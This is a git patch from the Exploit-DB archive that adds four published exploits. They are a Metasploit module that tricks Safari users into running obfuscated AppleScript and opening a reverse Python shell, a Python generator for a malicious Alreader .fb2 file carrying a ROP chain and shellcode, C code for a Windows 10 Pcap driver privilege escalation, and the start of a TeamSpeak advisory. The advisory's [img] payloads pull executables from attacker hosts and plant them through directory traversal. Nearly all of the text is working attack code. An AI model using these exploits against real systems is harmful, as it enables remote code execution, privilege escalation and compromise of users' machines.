From d0e0fe59411997c3e06d4d741da66eb69b39a29a Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 27 Oct 2015 05:02:38 +0000
Subject: [PATCH] DB: 2015-10-27

4 new exploits
---
 files.csv                          |   4 +
 platforms/osx/remote/38535.rb      |  93 ++++++
 platforms/windows/local/38532.py   | 463 +++++++++++++++++++++++++++++
 platforms/windows/local/38533.c    | 193 ++++++++++++
 platforms/windows/remote/38513.txt | 132 ++++++++
 5 files changed, 885 insertions(+)
 create mode 100755 platforms/osx/remote/38535.rb
 create mode 100755 platforms/windows/local/38532.py
 create mode 100755 platforms/windows/local/38533.c
 create mode 100755 platforms/windows/remote/38513.txt

diff --git a/files.csv b/files.csv
index 0e2b8b28c..908d9c7ca 100755
--- a/files.csv
+++ b/files.csv
@@ -34791,6 +34791,7 @@ id,file,description,date,author,platform,type,port
 38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting Vulnerability",2013-05-11,"Gjoko Krstic",php,webapps,0
 38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload Vulnerability",2013-05-14,"Drew Calcott",php,webapps,0
 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0
+38513,platforms/windows/remote/38513.txt,"TeamSpeak Client <= 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0
 38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0
 38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability",2013-05-15,ByEge,php,webapps,0
 38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting Vulnerability",2013-05-14,"Deepankar Arora",php,webapps,0
@@ -34806,3 +34807,6 @@ id,file,description,date,author,platform,type,port
 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
+38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
+38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
+38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
diff --git a/platforms/osx/remote/38535.rb b/platforms/osx/remote/38535.rb
new file mode 100755
index 000000000..5324385c8
--- /dev/null
+++ b/platforms/osx/remote/38535.rb
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Safari User-Assisted Applescript Exec Attack',
+      'Description'    => %q{
+        In versions of Mac OS X before 10.11.1, the applescript:// URL
+        scheme is provided, which opens the provided script in the Applescript
+        Editor. Pressing cmd-R in the Editor executes the code without any
+        additional confirmation from the user. By getting the user to press
+        cmd-R in Safari, and by hooking the cmd-key keypress event, a user
+        can be tricked into running arbitrary Applescript code.
+
+        Gatekeeper should be disabled from Security & Privacy in order to
+        avoid the unidentified Developer prompt.
+      },
+      'License'         => MSF_LICENSE,
+      'Arch'            => ARCH_CMD,
+      'Platform'        => ['unix', 'osx'],
+      'Compat'          =>
+        {
+          'PayloadType' => 'cmd'
+        },
+      'Targets'         =>
+        [
+          [ 'Mac OS X', {} ]
+        ],
+      'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => 'Oct 16 2015',
+      'Author'          => [ 'joev' ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7007' ],
+          [ 'URL', 'https://support.apple.com/en-us/HT205375' ]
+        ],
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::SAFARI,
+        :os_name => OperatingSystems::Match::MAC_OSX
+      }
+    ))
+
+    register_options([
+      OptString.new('CONTENT', [false, "Content to display in browser",
+        "This page has failed to load. Press cmd-R to refresh."]),
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+    ], self.class)
+  end
+
+  def on_request_exploit(cli, request, profile)
+    print_status("Sending #{self.name}")
+    send_response_html(cli, exploit_html)
+  end
+
+  def exploit_html
+    "<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
+  end
+
+  def exploit_js
+    js_obfuscate %Q|
+      var as = Array(150).join("\\n") +
+        'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
+      var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
+      window.onkeydown = function(e) {
+        if (e.keyCode == 91) {
+          window.location = url;
+        }
+      };
+    |
+  end
+
+  def sh
+    'killall "Script Editor"; nohup ' + payload.encoded
+  end
+
+  def content
+    datastore['CONTENT']
+  end
+
+
+end
\ No newline at end of file
diff --git a/platforms/windows/local/38532.py b/platforms/windows/local/38532.py
new file mode 100755
index 000000000..2c2f80a14
--- /dev/null
+++ b/platforms/windows/local/38532.py
@@ -0,0 +1,463 @@
+#!/usr/bin/env python
+
+#*************************************************************************************************************
+# Exploit Title:          Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
+# Date:                   25.10.2015
+# Category:               Local Exploit
+# Exploit Author:         g00dv1n
+# Contact:                g00dv1n.private@gmail.com
+# Version:                2.5
+# Tested on:              Windows XP SP3 / Windows 7 / Windows 8 
+# Vendor Homepage:        http://www.alreader.com/index.php?lang=en
+# Software Link (ENG):    http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
+# Software Link (RU):     http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
+# CVE: 
+
+
+
+# Description:
+# Alreader 2.5 its  free FB2 reader for Windows. 
+# FB2 format its just XML. FB2 contain   <author> <first-name> </first-name>  </author>  block. 
+# Overflow occurs if you create a long name of the author.
+# App used WCHAR  (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
+# For example 41 41  -  00 41 00 41
+# So We should use UTF-16. 
+#
+# Also, we can use single null byte in payload.
+# 
+# 
+#
+# Instructions:  
+# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
+# 2. Run Alreader.exe
+# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
+# 4. Enjoy running Calc.exe
+#
+# Exploit owerview:
+# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
+# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
+# run Shellcode.
+#
+# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload 
+# ( It is necessary to adjust the offset in different systems .)
+# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP 
+# ( It is necessary to adjust the offset in different systems .)
+# Then the control get ROP chain .
+# 
+# Program have Russian (RU) and English (Eng) versions. 
+# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
+# For a combination of two versions into one exploit I place two ROP chains one after another.
+# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
+# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs  arises yet another exepiton and Call ADD ESP, 808h.
+# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
+# With these tricks, the exploit works correctly for both versions.
+#
+# Below is ANSI-diagram of the payload: 
+#
+#                              =-------------------------=
+#                              |          gdvn           |        just fan magic bytes       
+#                              |-------------------------|                         
+#                              |                         |
+#                              |   jmp from SEH adress   |        x 500    Spray Andress to Jump from oveeride SEH
+#                              |                         |                        (ADD ESP, 808h RETN 4) 
+#                              |-------------------------|                         
+#                              |                         |
+#                              |        ROP NOP          |        x 500    Spray  ROP NOP (RETN)   
+#                              |                         |
+#                              |-------------------------|                         
+#                              |                         |
+#                              |      ROP chain for      |
+#                              |       RU version        |
+#                              |                         |
+#                              |-------------------------|                         
+#                              |        SHELLCODE        |        Run Calc.exe
+#                              |-------------------------|                         
+#                              |                         |
+#                              |        ROP NOP          |        x 250     Spray  ROP NOP (RETN) 
+#                              |                         |
+#                              |-------------------------|                         
+#                              |                         |
+#                              |      ROP chain for      |
+#                              |       ENG version       |
+#                              |                         |
+#                              |-------------------------|                          
+#                              |        SHELLCODE        |        Run Calc.exe
+#                              |-------------------------|                         
+#                              |                         |
+#                              |      ROP chain for      |
+#                              |       ENG version       |
+#                              |                         |
+#                              |-------------------------|                          
+#                              |                         |
+#                              |                         |
+#                              |          Junk           |        'A' x 6000
+#                              |                         |                         
+#                              |                         |
+#                              =-------------------------=
+#
+#
+#
+# 
+#
+#**************************************************************************************************************
+
+
+
+
+#######################################################################################################
+from struct import *
+
+#######################################################################################################
+file_result = "AlReader-fb2-PoC-exploit.fb2"
+
+
+########################################################################################################
+
+fuz_text  = ''                                # init fuzzy string 
+
+
+
+
+jmp_to  = pack('<I',0x00442391 )              # 0x00442391 ADD ESP, 808h RETN 4
+
+ret_NOP =  pack('<I',0x00448147 )             # RETN
+
+
+##################################### START CREATE ROP CHAINs ############################################
+
+fuz_text += 'gdvn'                              # magic init bytes
+
+
+
+fuz_text += jmp_to * 500                        # spray adr
+
+
+
+fuz_text += ret_NOP * 500                       # spray RETN adr
+
+
+
+####################################### ROP CHAIN FOR RUS VERSION ########################################
+
+# Prepare to call GetModuleHandleW
+# EDI = GetModuleHandleW adr
+# ESI = ret adr 
+# EBP = ptr to unicode 'kernel32.dll'
+                  
+ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
+module_handlew_adr = pack('<I',0x004FC8FC )     # 0x004FC8FC GetModuleHandleW adr
+kernel32_u = pack('<I',0x0560944 )              # 0x0560944 ptr to unicode 'kernel32.dll'
+
+
+#0x004904a6 :  #  POP EDI # POP ESI # POP EBP # POP EBX # RETN 
+fuz_text +=  pack('<I',0x004904a6 )   + module_handlew_adr + ret_adr_after + kernel32_u
+
+fuz_text +=  '\x41' *  4
+
+                                                
+fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN
+
+fuz_text +=  '\x41' *  36
+
+fuz_text += pack('<I',0x004b310d )              # 0x004b310d :  # PUSHAD # RETN
+
+fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30
+
+
+#Junk
+#################################################
+fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN
+
+fuz_text +=  '\x41' *  36
+#################################################
+
+#EAX = kernel32 base adr
+
+# Prepare to call GetProcAdress
+# EDI = GetProcAdress adr
+# ESI = ret adr 
+# EBP = kernel32 base adr
+# ESP = ptr to ANSII 'VirtualProtect00'
+
+
+ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             
+
+get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAdress
+
+
+# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
+
+fuz_text += pack('<I',0x004904A8 )  + get_proc_adr +  ret_adr_after           
+
+fuz_text +=  '\x41' *  8
+
+
+fuz_text += pack('<I',0x004b9e9e )             # 0x004b9e9e :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
+
+fuz_text += pack('<I',0x004b310d )             # 0x004b310d :  # PUSHAD # RETN
+
+fuz_text += 'VirtualProtect' + '\x00'
+
+fuz_text +=  '\x41' *  17                      # correct ESP pointer 
+
+
+########################################################
+# Prepare registrs for Virtual protect call
+
+# EDI = ROP NOP
+# ESI = VirtualProtect adr 
+# EBP = Ret adr
+# ESP = auto
+# EBX = 1 
+# EDX = 0x40
+# ECX = lpOldProtect (ptr to W address)
+
+# Now in EAX VP adr 
+
+fuz_text += pack('<I',0x00489cdd )              # 0x00489cdd,  # PUSH EAX # POP ESI # RETN 
+
+fuz_text += pack('<I',0x004a6392 )              # 0x004a6392,  # POP EBX # RETN 
+
+fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD0,  # EBX = 5DE58BD1
+
+fuz_text += pack('<I',0x004e7d31 )              # 0x004e7d31,  # SUB EBX,5DE58BD0 # RETN # EBX = 1
+
+fuz_text += pack('<I',0x004fc23c )              # 0x004fc23c,  # XOR EDX,EDX # RETN  # EDX = 0
+
+fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
+
+fuz_text += pack('<I',0x0048c064 )              # 0x0048c064,  # POP ECX # RETN 
+
+fuz_text += pack('<I',0x00629eea )              # 0x00629eea,  # &Writable location 
+
+fuz_text += pack('<I',0x00487d6a )              # 0x00487d6a,  # POP EDI # RETN 
+
+fuz_text += pack('<I',0x004f4401 )              # 0x004f4401,  # RETN (ROP NOP)
+
+
+
+fuz_text += pack('<I',0x004e6379 )              # 0x004e6379,  # POP EBP # RETN 
+
+ret_adr_after = pack('<I',0x004f831c )          # ret adr  #  0x004f831c # ADD ESP,24 # RETN
+
+
+fuz_text += ret_adr_after
+
+fuz_text+= pack('<I',0x004ecfab )               # 0x004ecfab,  # PUSHAD # RETN 
+
+fuz_text +=  '\x41' *  32                       # Correct poiter to ESP
+
+
+
+fuz_text += pack('<I',0x004a37bd )              # 0x004a37bd : # jmp esp 
+
+fuz_text += '\x90' * 16                         # NOP's :-)
+
+
+##################################### END ROP CHAIN #########################################
+
+#############################################################################################
+#PASTE SHELLCODE HERE
+
+
+
+
+# Run Calc
+shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
+"\x45\x81\x3e\x43\x72\x65\x61\x75"
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
+"\x6c\x63\x89\xe2\x52\x52\x53\x53"
+"\x53\x53\x53\x53\x52\x53\xff\xd7");
+
+
+fuz_text += shellcode
+
+
+############################################################################################# 
+fuz_text += ret_NOP * 250                       # spray RETN adr
+
+#############################################################################################
+
+############################### ROP CHAIN FOR ENG VERSION ###################################
+
+
+
+
+
+
+
+# Prepare to call GetModuleHandleW
+# EDI = GetModuleHandleW adr
+# ESI = ret adr 
+# EBP = ptr to unicode 'kernel32.dll'
+                  
+ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
+module_handlew_adr = pack('<I',0x004FC85C )     # 0x004FC85C GetModuleHandleW adr
+kernel32_u = pack('<I',0x00560724 )              # 0x00560724  ptr to unicode 'kernel32.dll'
+
+
+#0x00488ed6 :  # POP EDI # POP ESI # POP EBP # POP EBX # RETN 
+fuz_text +=  pack('<I',0x00488ed6 )   + module_handlew_adr + ret_adr_after + kernel32_u
+
+fuz_text +=  '\x41' *  4
+
+                                                
+fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN
+
+fuz_text +=  '\x41' *  36
+
+fuz_text += pack('<I',0x004b3ded )              # 0x004b3ded :  # PUSHAD # RETN
+
+fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30
+
+
+#Junk
+#################################################
+fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN
+
+fuz_text +=  '\x41' *  36
+#################################################
+
+#EAX = kernel32 base adr
+
+# Prepare to call GetProcAdress
+# EDI = GetProcAdress adr
+# ESI = ret adr 
+# EBP = kernel32 base adr
+# ESP = ptr to ANSII 'VirtualProtect00'
+
+
+ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             
+
+get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAdress
+
+
+# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
+
+fuz_text += pack('<I',0x00488ed6 )  + get_proc_adr +  ret_adr_after           
+
+fuz_text +=  '\x41' *  8
+
+
+fuz_text += pack('<I',0x004b9dfe )             # 0x004b9dfe :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
+
+fuz_text += pack('<I',0x004b3ded )             # 0x004b3ded :  # PUSHAD # RETN
+
+fuz_text += 'VirtualProtect' + '\x00'
+
+fuz_text +=  '\x41' *  17                      # correct ESP pointer 
+
+
+########################################################
+# Prepare registrs for Virtual protect call
+
+# EDI = ROP NOP
+# ESI = VirtualProtect adr 
+# EBP = Ret adr
+# ESP = auto
+# EBX = 1 
+# EDX = 0x40
+# ECX = lpOldProtect (ptr to W address)
+
+# Now in EAX VP adr 
+
+fuz_text += pack('<I',0x00489c3d )              # 0x00489c3d,  # PUSH EAX # POP ESI # RETN 
+
+fuz_text += pack('<I',0x00481c40 )              # 0x00481c40,  # POP EBX # RETN 
+
+fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD0,  # EBX = 5DE58BD1
+
+fuz_text += pack('<I',0x004e7c91 )              # 0x004e7c91,  # SUB EBX,5DE58BD0 # RETN # EBX = 1
+
+fuz_text += pack('<I',0x004fc19c )              # 0x004fc19c,  # XOR EDX,EDX # RETN 
+
+fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
+
+fuz_text += pack('<I',0x004f39dc )              # 0x004f39dc,  # POP ECX # RETN 
+
+fuz_text += pack('<I',0x0062909d )              # 0x0062909d,  # &Writable location 
+
+fuz_text += pack('<I',0x00495df4 )              # 0x00495df4,  # POP EDI # RETN 
+
+fuz_text += pack('<I',0x00483a02 )              # 0x00483a02,  # RETN (ROP NOP)
+
+
+
+fuz_text += pack('<I',0x004fb3c6 )              # 0x004fb3c6,  # POP EBP # RETN 
+
+ret_adr_after = pack('<I',0x004a8ee8 )          # ret adr  #  0x004a8ee8 # ADD ESP,24 # RETN
+
+
+fuz_text += ret_adr_after
+
+fuz_text+= pack('<I',0x004b3ded )               # 0x004b3ded,  # PUSHAD # RETN 
+
+fuz_text +=  '\x41' *  32                       # Correct poiter to ESP
+
+
+
+fuz_text += pack('<I',0x004757a7  )              # 0x004757a7  : # jmp esp 
+
+fuz_text += '\x90' * 16                         # NOP's :-)
+
+
+fuz_text += shellcode
+
+
+
+
+
+
+
+
+##############################################################################################
+fuz_text += '\x41' * 6000                       # final junk
+
+
+################################ GENERATE utf-16 fb2 file ####################################
+
+start = '''
+<?xml version="1.0" encoding="unicode-utf_16"?>
+<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
+  <description>
+    <title-info>
+      <author>
+        <first-name> 
+    '''
+
+end   = '''
+   <middle-name/>
+        <last-name/>
+      </author>
+      <book-title>EXPLOIT TEST</book-title>
+	 </title-info>
+    </description>
+</FictionBook>
+'''
+start_u = start.encode('utf-16')
+
+end_u = end.encode('utf-16')
+
+fout = open(file_result, 'wb')
+fout.write(start_u)
+fout.close()
+
+fout = open(file_result,'ab')
+fout.write(fuz_text)
+fout.close()
+
+fout = open(file_result,'ab')
+fout.write(end_u)
+fout.close()
+
+
+print "[*] File successfully created !!\n\n"
\ No newline at end of file
diff --git a/platforms/windows/local/38533.c b/platforms/windows/local/38533.c
new file mode 100755
index 000000000..dc3cb2161
--- /dev/null
+++ b/platforms/windows/local/38533.c
@@ -0,0 +1,193 @@
+## Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
+
+#include <stdio.h>
+#include <tchar.h>
+#include<Windows.h>
+#include<stdio.h>
+#include <winternl.h>
+#include <intrin.h>
+#include <psapi.h>
+#include <strsafe.h>
+#include <assert.h>
+
+#define	SL_IOCTL_GET_EVENT_NAME		CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
+#define STATUS_SUCCESS					((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH		((NTSTATUS)0xc0000004L)
+
+/* found with :
+!token 
+1: kd> dt nt!_OBJECT_HEADER
+   +0x000 PointerCount     : Int4B
+   +0x004 HandleCount      : Int4B
+   +0x004 NextToFree       : Ptr32 Void
+   +0x008 Lock             : _EX_PUSH_LOCK
+   +0x00c TypeIndex        : UChar
+   +0x00d TraceFlags       : UChar
+   +0x00e InfoMask         : UChar
+   +0x00f Flags            : UChar
+   +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+   +0x010 QuotaBlockCharged : Ptr32 Void
+   +0x014 SecurityDescriptor : Ptr32 Void
+   +0x018 Body             : _QUAD
+
+TypeIndex is 0x5
+*/
+#define HANDLE_TYPE_TOKEN				0x5
+
+
+// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
+const SYSTEM_INFORMATION_CLASS SystemHandleInformation = 
+(SYSTEM_INFORMATION_CLASS)16;
+
+// The NtQuerySystemInformation function and the structures that it returns 
+// are internal to the operating system and subject to change from one 
+// release of Windows to another. To maintain the compatibility of your 
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
+	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	OUT PVOID SystemInformation,
+	IN ULONG SystemInformationLength,
+	OUT PULONG ReturnLength OPTIONAL
+	);
+
+// Undocumented structure: SYSTEM_HANDLE_INFORMATION
+typedef struct _SYSTEM_HANDLE 
+{
+	ULONG ProcessId;
+	UCHAR ObjectTypeNumber;
+	UCHAR Flags;
+	USHORT Handle;
+	PVOID Object;
+	ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION 
+{
+	ULONG NumberOfHandles;
+	SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+
+// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
+const FILE_INFORMATION_CLASS FileNameInformation = 
+(FILE_INFORMATION_CLASS)9;
+
+// The NtQueryInformationFile function and the structures that it returns 
+// are internal to the operating system and subject to change from one 
+// release of Windows to another. To maintain the compatibility of your 
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
+	IN HANDLE FileHandle,
+	OUT PIO_STATUS_BLOCK IoStatusBlock,
+	OUT PVOID FileInformation,
+	IN ULONG Length,
+	IN FILE_INFORMATION_CLASS FileInformationClass
+	);
+
+// FILE_NAME_INFORMATION contains name of queried file object.
+typedef struct _FILE_NAME_INFORMATION {
+	ULONG FileNameLength;
+	WCHAR FileName[1];
+} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
+
+
+void* FindTokenAddressHandles(ULONG pid)
+{
+	/////////////////////////////////////////////////////////////////////////
+	// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
+	// 
+
+	// The functions have no associated import library. You must use the 
+	// LoadLibrary and GetProcAddress functions to dynamically link to 
+	// ntdll.dll.
+
+	HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
+	assert(hNtDll != NULL);
+
+	PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = 
+		(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, 
+		"NtQuerySystemInformation");
+	assert(NtQuerySystemInformation != NULL);
+
+
+	/////////////////////////////////////////////////////////////////////////
+	// Get system handle information.
+	// 
+
+	DWORD nSize = 4096, nReturn;
+	PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
+		HeapAlloc(GetProcessHeap(), 0, nSize);
+
+	// NtQuerySystemInformation does not return the correct required buffer 
+	// size if the buffer passed is too small. Instead you must call the 
+	// function while increasing the buffer size until the function no longer 
+	// returns STATUS_INFO_LENGTH_MISMATCH.
+	while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, 
+		nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
+	{
+		HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+		nSize += 4096;
+		pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
+			GetProcessHeap(), 0, nSize);
+	}
+
+	for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
+	{
+
+		PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
+
+		if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
+		{
+			printf(" ObjectTypeNumber %d , ProcessId %d , Object  %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
+			return pHandle->Object;
+		}
+	}
+
+	/////////////////////////////////////////////////////////////////////////
+	// Clean up.
+	// 
+	HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+
+	return 0;
+}
+
+void main()
+{
+	DWORD dwBytesReturned;
+	DWORD ShellcodeFakeMemory;
+	HANDLE token;
+
+
+	// first create toke handle so find  object address with handle 
+	if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
+		DebugBreak();
+	
+	void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
+
+	CloseHandle(token);
+
+	// i dont want write fully weaponized exploit so criminal must write code to find  "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)  
+	HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+  if(hDriver!=INVALID_HANDLE_VALUE)
+  {
+	   fprintf(stderr," Open Driver OK\n");
+
+	  if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
+	  {
+		  fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
+		  return;
+	  }
+	  else  fprintf(stderr," Send IOCTL OK\n");
+  }
+
+  else 
+  {
+	  fprintf(stderr," Open Driver error %d.\n",GetLastError());
+	  return;
+  }
+
+
+  CloseHandle(hDriver);
+  getchar();
+
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/38513.txt b/platforms/windows/remote/38513.txt
new file mode 100755
index 000000000..496bca28a
--- /dev/null
+++ b/platforms/windows/remote/38513.txt
@@ -0,0 +1,132 @@
+Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE
+Date: 12/10/2015
+Author: Scurippio <scurippio@anche.no> / (0x6FB30B11 my pgp keyid) 
+Vendor Homepage: https://www.teamspeak.com/ 
+Application:  TeamSpeak 3
+Version:  TeamSpeak3 Client 3.0.0 - 3.0.18.1
+Platforms:  Windows, Mac OS X and Linux
+Exploitation: Remote
+Risk : Very High
+
+=========
+The Bug
+=========
+
+The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution. 
+By changing the channel description you can insert a [img] bb tag with malicious content.
+
+There are a few problems with the image caching on disk.
+
+1: There is no check on file extension.
+
+2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc. 
+
+	Example:
+
+	[img] http://yourevilhost.com/thefile.hta [/img]
+	[img] http://yourevilhost.com/thefile.msi [/img]
+	[img] http://yourevilhost.com/thefile.vbs [/img]
+	...
+
+3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted.
+
+	Example:
+
+	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta
+	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi
+	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs
+	...
+
+4: It is possible to do a Directory Traversal with a simple urlencode of the traversal path bypassing the built-in control.
+This is the critical hole, if you combine the previous vulnerabilities you can save a malicious file in any path on the OS with the same permissions as Teamspeak client.
+
+	Example:
+
+	[img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img]
+
